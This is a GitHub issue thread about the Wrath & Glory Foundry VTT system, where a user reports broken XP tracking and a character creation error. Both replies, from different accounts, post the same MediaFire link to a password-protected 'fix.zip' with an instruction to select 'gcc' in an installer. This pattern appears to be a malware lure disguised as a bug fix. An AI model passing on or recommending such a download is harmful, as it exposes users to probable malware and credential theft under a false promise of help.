### ISSUE TITLE
[Wrath & Glory System] XP doesn't track anymore + Character Creation is broken

### ISSUE THREAD

**Issue by moo-man** [moo-man/WrathAndGlory-FoundryVTT#272]
When changing attributes or skills on the sheet, the xp doesn't change on the sheet. Also, most times I've tried to do character creation, you cannot complete it as it says there is defunct code from V10 that gives an error. This happened specifically on the "Interrogator" Archetype creation, in Forsaken Systems but most likely for others too. Thank you for reading, I love this system and the work you've done up to this point.<br/>**From**: Piesmartguy<br/>wrath-and-glory: 5.1.5<br/>wng-core: 4.0.6<br/>wng-forsaken: 4.0.3<br/>Active Modules: actually-private-rolls, adventure-import-export, ambientdoors, autoanimations, baileywiki-nuts-and-bolts, bnw-club, bnw-scenic-sci-fi, challenge-tracker, color-picker, combat-utility-belt, dae, dd-import, df-active-lights, dice-so-nice, dice-so-nice-more-sfx-triggers, drag-ruler, entice-with-dice-so-nice, fa-battlemaps, fast-flip, forien-quest-log, foundryvtt-simple-calendar, fxmaster, group-initiative, healthEstimate, HyperdriveFleet-Animated-Ouroboros-Part2, HyperdriveFleet-AnimatedOuroboros-Part1, HyperdriveFleet-Crystal-Mines, jb2a_patreon, lib-wrapper, lordudice, michaelghelfi, miskasmaps, miskasmaps-scifi2, miskasmaps-scifi3, miskasmaps-scifi4, miskasmaps-scifi5, monks-active-tiles, monks-bloodsplats, monks-scene-navigation, multilevel-tokens, NRSAP, pings, popout, scene-packer, sequencer, settings-extender, smalltime, socketlib, tagger, tile-scroll, tile-sort, token-attacher, token-auras, token-hud-wildcard, tokenmagic, torch, warpgate

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
